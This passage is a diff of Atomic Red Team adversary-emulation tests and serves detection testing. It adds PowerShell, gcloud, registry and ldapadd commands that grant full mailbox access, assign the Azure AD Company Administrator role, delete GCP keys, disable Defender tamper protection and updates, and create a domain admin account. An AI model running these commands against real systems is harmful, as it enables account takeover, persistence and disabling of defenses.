+This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - EXO - Full access mailbox permission granted to a user](#atomic-test-1---exo---full-access-mailbox-permission-granted-to-a-user)
+
+
+<br/>
+
+## Atomic Test #1 - EXO - Full access mailbox permission granted to a user
+Give a nominated user, full mailbox delegation access of another user.
+This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
+
+**Supported Platforms:** Office-365
+
+
+**auto_generated_guid:** 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | office-365 username | string | o365_user_test@contoso.com|
+| password | office-365 password | string | o365_password_test|
+| delegate_target | office-365 target_email | string | delegate@contoso.com|
+| operator_mailbox | office-365 target_email | string | operator@contoso.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module ExchangeOnlineManagement
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
+Disconnect-ExchangeOnline -Confirm:$false
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module ExchangeOnlineManagement
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
+Disconnect-ExchangeOnline -Confirm:$false
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: ExchangeOnlineManagement PowerShell module must be installed
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement
+```
+
+
+
+
+<br/>
@@ -0,0 +1,54 @@
+attack_technique: T1098.002
+display_name: 'Account Manipulation: Additional Email Delegate Permissions'
+atomic_tests:
+- name: EXO - Full access mailbox permission granted to a user
+  auto_generated_guid: 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+  description: |
+    Give a nominated user, full mailbox delegation access of another user.
+    This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
+  supported_platforms:
+  - office-365
+  input_arguments:
+    username:
+      description: office-365 username
+      type: string
+      default: o365_user_test@contoso.com
+    password:
+      description: office-365 password
+      type: string
+      default: o365_password_test
+    delegate_target:
+      description: office-365 target_email
+      type: string
+      default: delegate@contoso.com
+    operator_mailbox:
+      description: office-365 target_email
+      type: string
+      default: operator@contoso.com
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      ExchangeOnlineManagement PowerShell module must be installed
+    prereq_command: |
+      $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name ExchangeOnlineManagement         
+  executor:
+    command: |
+      Import-Module ExchangeOnlineManagement
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
+      Disconnect-ExchangeOnline -Confirm:$false
+    cleanup_command: |
+      Import-Module ExchangeOnlineManagement
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
+      Disconnect-ExchangeOnline -Confirm:$false
+    name: powershell
+    elevation_required: false
@@ -0,0 +1,71 @@
+# T1098.003 - Account Manipulation: Additional Cloud Roles
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/003)
+<blockquote>An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
+(Citation: Microsoft O365 Admin Roles) 
+
+This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
+
+For example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
+
+Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Azure AD - Add Company Administrator Role to a user](#atomic-test-1---azure-ad---add-company-administrator-role-to-a-user)
+
+
+<br/>
+
+## Atomic Test #1 - Azure AD - Add Company Administrator Role to a user
+Add an existing Azure user account the Company Administrator Role.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | string | jonh@contoso.com|
+| password | Azure AD password | string | p4sswd|
+| target_user | Name of the user who will be assigned the Company Admin role | string | default|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module MSOnline
+$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+Connect-MsolService -Credential $Credential
+Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: MSOnline module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name MSOnline -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name MSOnline -Force
+```
+
+
+
+
+<br/>
@@ -0,0 +1,41 @@
+attack_technique: T1098.003
+display_name: 'Account Manipulation: Additional Cloud Roles'
+atomic_tests:
+- name: Azure AD - Add Company Administrator Role to a user
+  auto_generated_guid: 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
+  description: |
+    Add an existing Azure user account the Company Administrator Role.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: string
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: string
+      default: p4sswd
+    target_user:
+      description: Name of the user who will be assigned the Company Admin role
+      type: string
+      default: default
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+     MSOnline module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name MSOnline -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name MSOnline -Force
+  executor:
+    command: |
+      Import-Module MSOnline
+      $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+      Connect-MsolService -Credential $Credential
+      Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
+    cleanup_command: |
+      Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
+    name: powershell
+    elevation_required: false
@@ -38,6 +38,8 @@ In order to create or manipulate accounts, the adversary must already have suffi

 - [Atomic Test #16 - Domain Password Policy Check: Common Password Use](#atomic-test-16---domain-password-policy-check-common-password-use)

+- [Atomic Test #17 - GCP - Delete Service Account Key](#atomic-test-17---gcp---delete-service-account-key)
+

 <br/>

@@ -1253,4 +1255,100 @@ $cred.Password | ConvertFrom-SecureString | Out-File "#{cred_file}"



+<br/>
+<br/>
+
+## Atomic Test #17 - GCP - Delete Service Account Key
+This Atomic will: 
+  - Create a service account
+  - Create a service account key, 
+  - Store the result of retrieving a single key for that service account as a variable
+  - Pass that variable for deletion
+  - Delete the service account
+
+The idea for this Atomic came from a Rule published by the Elastic team.
+
+Identifies the deletion of an Identity and Access Management (IAM) service account key in Google Cloud Platform (GCP).
+Each service account is associated with two sets of public/private RSA key pairs that are used to authenticate. 
+If a key is deleted, the application will no longer be able to access Google Cloud resources using that key. A security best practice is to rotate your service account keys regularly.
+
+Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
+
+**Supported Platforms:** Iaas:gcp
+
+
+**auto_generated_guid:** 7ece1dea-49f1-4d62-bdcc-5801e3292510
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| project_id | ID of the GCP Project you to execute the command against. | string | atomic-test-1|
+| service_name | The name of the service account. | string | atomic-service-account|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+gcloud config set project #{project_id}
+KEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
+gcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet
+```
+
+#### Cleanup Commands:
+```sh
+cd $PathToAtomicsFolder/T1098/src/T1098-17/
+terraform state rm google_service_account_key.key
+terraform destroy -auto-approve
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Requires gcloud
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+```
+##### Description: Check if user is logged in
+##### Check Prereq Commands:
+```sh
+gcloud config get-value account
+```
+##### Get Prereq Commands:
+```sh
+gcloud auth login --no-launch-browser
+```
+##### Description: Check if terraform is installed.
+##### Check Prereq Commands:
+```sh
+terraform version
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the terraform.
+```
+##### Description: Create dependency resources using terraform
+##### Check Prereq Commands:
+```sh
+stat $PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate
+```
+##### Get Prereq Commands:
+```sh
+cd $PathToAtomicsFolder/T1098/src/T1098-17/
+terraform init
+terraform apply -auto-approve
+```
+
+
+
+
 <br/>
@@ -945,3 +945,70 @@ atomic_tests:
      else {
          Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
      }
+- name: GCP - Delete Service Account Key
+  auto_generated_guid: 7ece1dea-49f1-4d62-bdcc-5801e3292510
+  description: |
+    This Atomic will: 
+      - Create a service account
+      - Create a service account key, 
+      - Store the result of retrieving a single key for that service account as a variable
+      - Pass that variable for deletion
+      - Delete the service account
+    
+    The idea for this Atomic came from a Rule published by the Elastic team.
+
+    Identifies the deletion of an Identity and Access Management (IAM) service account key in Google Cloud Platform (GCP).
+    Each service account is associated with two sets of public/private RSA key pairs that are used to authenticate. 
+    If a key is deleted, the application will no longer be able to access Google Cloud resources using that key. A security best practice is to rotate your service account keys regularly.
+
+    Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
+  supported_platforms:
+  - iaas:gcp
+  input_arguments:
+    project_id:
+      description: ID of the GCP Project you to execute the command against.
+      type: string
+      default: atomic-test-1
+    service_name:
+      description: The name of the service account.
+      type: string
+      default: atomic-service-account
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      gcloud config set project #{project_id}
+      KEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
+      gcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet
+    cleanup_command: |
+      cd $PathToAtomicsFolder/T1098/src/T1098-17/
+      terraform state rm google_service_account_key.key
+      terraform destroy -auto-approve
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Requires gcloud
+    prereq_command: |
+      if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+  - description: | 
+      Check if user is logged in 
+    prereq_command: |
+      gcloud config get-value account
+    get_prereq_command: |
+      gcloud auth login --no-launch-browser
+  - description: |
+      Check if terraform is installed.
+    prereq_command: |
+      terraform version
+    get_prereq_command: |
+        echo Please install the terraform.
+  - description: |
+      Create dependency resources using terraform
+    prereq_command: |
+      stat $PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate
+    get_prereq_command: |
+      cd $PathToAtomicsFolder/T1098/src/T1098-17/
+      terraform init
+      terraform apply -auto-approve
@@ -0,0 +1,18 @@
+provider "google" {
+}
+
+variable "project_id" {
+}
+
+variable "service_name" {
+}
+
+resource "google_service_account" "service_account" {
+  account_id = var.service_name
+  project    = var.project_id
+}
+
+resource "google_service_account_key" "key" {
+  service_account_id = google_service_account.service_account.name
+  public_key_type    = "TYPE_X509_PEM_FILE"
+}
@@ -0,0 +1,2 @@
+project_id   = ""
+service_name = ""
@@ -122,6 +122,8 @@ The Registry of a remote system may be modified to aid in execution of files as

 - [Atomic Test #56 - Snake Malware Registry Blob](#atomic-test-56---snake-malware-registry-blob)

+- [Atomic Test #57 - Allow Simultaneous Download Registry](#atomic-test-57---allow-simultaneous-download-registry)
+

 <br/>

@@ -992,7 +994,7 @@ See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d


 ```cmd
-reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
 ```

 #### Cleanup Commands:
@@ -1865,12 +1867,12 @@ Disable Win Defender Notification. Redline is using this to disable this win def


 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 0
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 0 /f
 ```


@@ -1897,12 +1899,12 @@ Disable Auto Update Windows OS feature. Redline is using this as part of its def


 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 0
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 0 /f
 ```


@@ -1929,12 +1931,12 @@ Disable Windows Auto Reboot for current logon user. Redline is using this as par


 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0 /f
 ```


@@ -1961,12 +1963,12 @@ Windows Auto Update Option to Notify before download. Redline is using this as p


 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 3
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 3 /f
 ```


@@ -1993,12 +1995,12 @@ Do Not Connect To Win Update. Redline is using this as part of its defense evasi


 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0 /f
 ```


@@ -2027,12 +2029,12 @@ tries to tamper this Win Defender feature settings.


 ```cmd
-reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0
+reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f
 ```

 #### Cleanup Commands:
 ```cmd
-reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5
+reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
 ```


@@ -2072,4 +2074,38 @@ $typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemPropert



+<br/>
+<br/>
+
+## Atomic Test #57 - Allow Simultaneous Download Registry
+A registry modification to allow Simultaneous download in the system.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 37950714-e923-4f92-8c7c-51e4b6fffbf6
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+```
+
+
+
+
+
 <br/>
@@ -399,7 +399,7 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
    name: command_prompt
@@ -786,9 +786,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
    cleanup_command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 0
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
 - name: Disable Windows OS Auto Update
@@ -799,9 +799,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f
    cleanup_command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 0
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
 - name: Disable Windows Auto Reboot for current logon user
@@ -812,9 +812,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f
    cleanup_command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
 - name: Windows Auto Update Option to Notify before download
@@ -825,9 +825,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2 /f
    cleanup_command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 3
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 3 /f
    name: command_prompt
    elevation_required: true
 - name: Do Not Connect To Win Update
@@ -838,9 +838,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f
    cleanup_command: |
-      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
 - name: Tamper Win Defender Protection
@@ -853,9 +853,9 @@ atomic_tests:
  - windows
  executor:
    command: |
-      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0
+      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f
    cleanup_command: |
-      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5
+      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
    name: command_prompt
    elevation_required: true
 - name: Snake Malware Registry Blob
@@ -871,4 +871,19 @@ atomic_tests:
    cleanup_command: |
      $typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemProperty -Path $typicalPath -Name "AtomicSnake" -ErrorAction SilentlyContinue | Out-Null
    name: powershell
-    elevation_required: true
+    elevation_required: true
+- name: Allow Simultaneous Download Registry
+  auto_generated_guid: 37950714-e923-4f92-8c7c-51e4b6fffbf6
+  description: |
+    A registry modification to allow Simultaneous download in the system.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+    cleanup_command: |
+      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+    name: command_prompt
+    elevation_required: true
@@ -12,6 +12,10 @@ Such accounts may be used to establish secondary credentialed access that do not

 - [Atomic Test #3 - Create a new Domain Account using PowerShell](#atomic-test-3---create-a-new-domain-account-using-powershell)

+- [Atomic Test #4 - Active Directory Create Admin Account](#atomic-test-4---active-directory-create-admin-account)
+
+- [Atomic Test #5 - Active Directory Create User Account (Non-elevated)](#atomic-test-5---active-directory-create-user-account-non-elevated)
+

 <br/>

@@ -140,4 +144,123 @@ cmd /c "net user #{username} /del >nul 2>&1"



+<br/>
+<br/>
+
+## Atomic Test #4 - Active Directory Create Admin Account
+Use Admin Credentials to Create A Domain Admin Account
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 562aa072-524e-459a-ba2b-91f1afccf5ab
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | The domain to be tested | string | example|
+| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | test|
+| admin_user | username@domain of a user with admin privileges | string | admin@example.test|
+| admin_password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD!|
+| domain_controller | Name of the domain_controller machine, defined in etc/hosts | string | adVM|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+echo "dn: CN=Admin User,CN=Users,DC=#{domain},DC=#{top_level_domain}\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@#{domain}.#{top_level_domain}\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=#{domain},DC=#{top_level_domain}" > tempadmin.ldif
+echo ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+ldapadd -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{admin_user} -w #{admin_password} -f tempadmin.ldif
+```
+
+#### Cleanup Commands:
+```sh
